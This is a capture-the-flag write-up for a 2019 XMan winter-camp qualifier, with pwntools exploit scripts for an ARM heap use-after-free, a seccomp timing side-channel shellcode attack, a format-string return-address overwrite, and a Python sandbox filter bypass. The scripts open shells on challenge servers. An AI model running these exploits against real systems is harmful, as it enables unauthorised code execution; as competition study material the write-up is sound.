第三届XMan冬令营选拔赛 - Writeup

@t3ls  December 23, 2019
tags: ctf write-up

第三届XMan冬令营选拔赛 - Writeup

Pwn

baby_arm

ARM 堆题。利用点是索引 0 被 delete 之后仍然可以 show / edit（UAF）：先从被释放块的 fd 读出一个 libc 指针算基址，再改写它的 fd/bk，让随后的 add(0x10) 落到 name 缓冲区伪造的块上（name 被填成连续的 0x19 当作 size 字段），借此把槽位 0 指向 atoi@got 并改成 system，最后在菜单输入 `sh` 触发。题目用的是魔改过的 libc 又不提供，system 相对泄露基址的偏移只能在附近暴力枚举（脚本里的 `for i in range(-0xa0, 0xa0, 0x10)`），也是佛了。

from pwn import *
import sys
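context.update(arch='arm', endian='little', log_level='debug')

# Target selection from argv[1]:
#   "r"  - the remote service (here a local docker port),
#   "l"  - run the binary under qemu-user,
#   else - run under qemu-user with a gdb stub on :1234 (attach gdb-multiarch).
# Default to "l" when no mode is given instead of dying with an IndexError.
mode = sys.argv[1] if len(sys.argv) > 1 else 'l'
if mode == 'r':
    p = remote('127.0.0.1', 14242)
elif mode == 'l':
    p = process(["qemu-arm-static", "-L", "/usr/arm-linux-gnueabihf", "./babyarm"])
else:
    p = process(["qemu-arm-static", "-g", "1234", "-L", "/usr/arm-linux-gnueabihf", "./babyarm"])
    sleep(1)  # let qemu bring up the gdb stub before we start talking to the target

e = ELF('./babyarm')
# NOTE: the challenge ships a modified libc that was not handed out, so this is
# the host's cross-compiler libc; its symbol offsets are only approximately
# right for the real target, which is why the main loop sweeps system()'s
# offset instead of trusting the symbol.
l = ELF('/usr/arm-linux-gnueabihf/lib/libc.so.6')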

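def add(size, data):
    """Menu option 1: allocate ``size`` bytes and write ``data`` into them.

    ``data`` is sent as-is.  The original wrapped it in ``str()``, which is a
    no-op for a Python 2 str but under Python 3 turns a ``p32()`` bytes payload
    into its ``b'...'`` repr and silently corrupts the heap write.
    """
    p.sendlineafter('choice:', '1')
    p.sendlineafter('size :', str(size))
    p.sendafter('Content :', data)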


def delete(idx):
    """Menu option 2: free the chunk in slot ``idx``.

    The exploit relies on the slot still being usable afterwards (show/edit
    on a freed index), i.e. the target evidently does not clear it.
    """
    steps = (('choice:', '2'), ('Index :', '{}'.format(idx)))
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)


def show(idx):
    """Menu option 3: print the contents of slot ``idx``.

    Called on a freed slot it leaks the chunk's fd pointer (the libc leak
    used by the main loop); the caller reads the bytes back itself.
    """
    steps = (('choice:', '3'), ('Index :', '{}'.format(idx)))
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)


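def edit(idx, data):
    """Menu option 5: overwrite the contents of slot ``idx`` with ``data``.

    Note the prompt is the lower-case ``'content:'`` (unlike ``add``).
    ``data`` is sent as-is: wrapping it in ``str()`` is a no-op on Python 2
    but mangles a bytes payload into its repr on Python 3.
    """
    p.sendlineafter('choice:', '5')
    p.sendlineafter('Index :', str(idx))
    p.sendafter('content:', data)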


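if __name__ == '__main__':
    def respawn():
        # Fresh target for the next sweep step.  Honour the mode the script
        # was started in: the original always dialled the remote port, which
        # is wrong when the target is a local qemu process.
        mode = sys.argv[1] if len(sys.argv) > 1 else 'l'
        if mode == 'r':
            return remote('127.0.0.1', 14242)
        return process(["qemu-arm-static", "-L", "/usr/arm-linux-gnueabihf", "./babyarm"])

    # The real libc is a modified build we do not have, so system()'s true
    # offset is unknown: try the host libc's symbol +/- a few 0x10 steps.
    for i in range(-0xa0, 0xa0, 0x10):
        try:
            # "name" = eight copies of 0x19: a fake chunk size field
            # (0x18 | PREV_INUSE) that a later allocation is steered into.
            p.sendlineafter('your name:', p32(0x19) * 8)
            add(0x40, '\n')  # slot 0
            add(0x10, '\n')  # slot 1: keeps slot 0 from merging with the top chunk on free
            delete(0)
            show(0)          # read after free: first 4 bytes = fd of the freed chunk = libc pointer
            # 0xf67b67cc - 0xf66ce000 is the leak-to-base delta observed on the
            # host libc; it need not match the modified target libc exactly,
            # which is what the offset sweep above compensates for.
            l.address = u32(p.recv(4)) - (0xf67b67cc - 0xf66ce000)
            p.recv(4)
            print(hex(l.address))
            # write after free: fd = 0, bk = 0x21080 (the fake chunk in the name
            # buffer).  0x21088 is presumably the chunk-pointer table (slot 0);
            # TODO confirm against the binary's .bss layout.
            edit(0, p32(0) + p32(0x21088 - 0x8))
            add(0x40, '\n')                    # take slot 0 back; the unlink writes through the poisoned bk
            add(0x10, p32(e.got['atoi']))      # carved from the fake chunk -> slot 0 now points at atoi@got
            edit(0, p32(l.symbols['system'] + i))  # atoi@got := system (+ guessed delta)
            p.sendlineafter('choice:', 'sh')   # the menu calls atoi("sh"), i.e. system("sh")
            # Liveness probe: only a real shell answers `ls`; otherwise the
            # connection dies and we land in the except branch.
            p.sendline('ls')
            p.recvline()
            p.recvline(timeout=0.5)
            p.interactive()
            break  # shell obtained - do not keep sweeping on a closed connection
        except Exception:
            p.close()
            p = respawn()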

NoooCall

seccomp 把系统调用都禁掉了，拿不到输出，只能做侧信道：shellcode 取 flag 的第 j 个字节与猜测值 cmp，猜中则不跳转、落入 `loop $` 原地自旋（连接读超时但不断开），猜错则 jne 跳过 loop、继续往下执行直到进程退出（连接 EOF）。脚本用“超时 / EOF”区分这两种情况，逐字节恢复 flag。

from pwn import *
# Shellcode below is assembled for x86-64; set log_level='debug' to trace I/O.
context.arch = 'amd64'

# Local debugging variant (run ./chall under gdb instead of the remote):
#   p = process('chall'); gdb.attach(p); pause()
p = remote('121.36.64.245', 10003)

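if __name__ == '__main__':
    def reconnect():
        # One fresh connection per probe: a spinning or dead target is never reused.
        return remote('121.36.64.245', 10003)

    flag = []
    # Flag length is assumed to be 32 bytes (not derived from the service).
    for j in range(32):
        # 0x100 rather than 0xff: the original never tried byte value 0xff.
        for i in range(0x100):
            try:
                # [rsp+0x18] is taken to hold a pointer to the flag buffer
                # (found while debugging the binary, not visible here -
                # verify under gdb).  Compare flag[j] against the guess.
                sc = asm('''
                    mov rbx,[rsp+0x18]
                    mov al,[rbx+{0}]
                    cmp al,{1}
                    '''.format(hex(j), hex(i)))
                # jne +2 : on a mismatch skip the next two bytes ...
                sc += b'\x75\x02'
                # loop $ : ... otherwise spin here (rcx is non-zero) so the
                # connection idles instead of closing.  Raw bytes, as the
                # '$'-relative forms are awkward to hand to asm().
                sc += b'\xe2\xfe'
                p.sendafter('Shellcode >>', sc)
                sleep(0.1)
                p.sendline('aaaaaaaaaaaaaaaaaa')
                # Match    -> target spins, recvline just times out.
                # Mismatch -> target runs off the end and dies, recvline
                #             raises EOFError (handled below).
                # A slow link can mimic a hang, so re-check doubtful bytes.
                p.recvline(timeout=0.5)
                p.close()
                p = reconnect()
                print('[+]chr {}:{}'.format(j, chr(i)))
                flag.append(chr(i))
                break
            except EOFError:
                print('[-]chr {}:{}'.format(j, chr(i)))
                p.close()
                p = reconnect()
        else:
            # No value made the target spin: record a placeholder so the
            # following positions stay aligned instead of shifting left.
            print('[?]chr {}: no match'.format(j))
            flag.append('?')
    print(''.join(flag))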

format

堆上的格式化字符串（32 位程序）。借助栈上的 ebp 链：先用 `%10$hhn` 改写链上某个栈指针的最低字节，使第 18 个参数正好指向返回地址所在的栈槽，再用 `%18$hn` 分两次（低半、高半）把返回地址改成 0x80485ab，即 system("/bin/sh")。那个最低字节只有低 4 位是固定的，高 4 位随栈随机化变化，所以要循环重连爆破。

from pwn import *
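context.update(arch='i386', log_level='debug')

# Local debugging variant (kept for reference):
#   p = process('./format', aslr=False)
#   gdb.attach(p, 'b *0x8048606\nc')
#   pause()

# Where the overwritten return address points: system("/bin/sh") per the
# writeup.  Both halves written below are derived from this constant instead
# of being repeated by hand, so they cannot drift apart.
shell = 0x80485ab

p = remote('119.3.172.70', 10005)

# Stack layout the payload assumes (found while debugging, not derivable here):
#   arg 10 -> a saved-ebp-chain pointer; setting its low byte makes
#   arg 18 -> the stack slot holding the return address.
# The low byte 0x4c is a guess whose upper nibble depends on stack
# randomisation - hence the retry loop below.  The '|' separators and the
# '~~' terminator suggest the target handles each piece with its own printf
# call (so every %n count starts at zero); with a single printf the counts
# would be cumulative and the values would need adjusting - confirm in gdb.
EBP_LOW = 0x4c
# probe used to leak the stack while working out the offsets:
# payload = '%18$p|'
payload = ''
payload += '%{}c%10$hhn|'.format(EBP_LOW)             # low byte of arg-10 pointer := 0x4c
payload += '%{}c%18$hn|'.format(shell & 0xffff)       # ret[0:2] := 0x85ab
payload += '%{}c%10$hhn|'.format(EBP_LOW + 2)         # low byte := 0x4e (ret + 2)
payload += '%{}c%18$hn|~~'.format(shell >> 16)        # ret[2:4] := 0x0804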
# Keep firing the same payload until the randomised stack nibble matches the
# guess baked into it; each failure kills the target, so reconnect and retry.
while True:
    try:
        p.sendlineafter('...', payload)
        sleep(0.1)
        p.recvuntil('~~')  # the terminator came back, the format string was processed
        p.sendline('ls')   # liveness probe: only a shell answers this
        for _ in range(2):
            p.recvline()
        p.interactive()
        break
    except Exception:
        # Wrong guess: the target died (EOF) or never echoed the terminator.
        # (Local variant: p = process('./format', aslr=False))
        p.close()
        p = remote('119.3.172.70', 10005)

Misc

ezzpython

沙箱的正则黑名单不完整，数字可以通过，于是不直接写字符串，而是用二进制整数字面量配合 `'%c' % n` 逐个字符拼出目标串 `flag?!@#`，再用 `+` 连接。

from pwn import *
# pwntools context is irrelevant to this payload builder (no asm involved); kept
# only so the script matches the other solvers' preamble.
context.arch = 'amd64'

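# The string to smuggle past the filter.  (This literal on the original page
# was mangled by an e-mail obfuscator; it is reconstructed from the final
# payload, whose binary literals decode to exactly these characters.)
FLAG_CHARS = 'flag?!@#'

# The filter lets digits through, so every character is rebuilt at run time
# as '%c' % <binary int literal>.  Joining with '+' instead of appending '+'
# after each term avoids the dangling operator the original left at the end,
# which would be a syntax error if pasted verbatim.
payload = '+'.join("'%c'%{}".format(bin(ord(ch))) for ch in FLAG_CHARS)

print(payload)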

最终payload

'%c'%0b1100110+'%c'%0b1101100+'%c'%0b1100001+'%c'%0b1100111+'%c'%0b111111+'%c'%0b100001+'%c'%0b1000000+'%c'%0b100011

ShellMaster

输入$0获取当前shell,再用base64读取flag

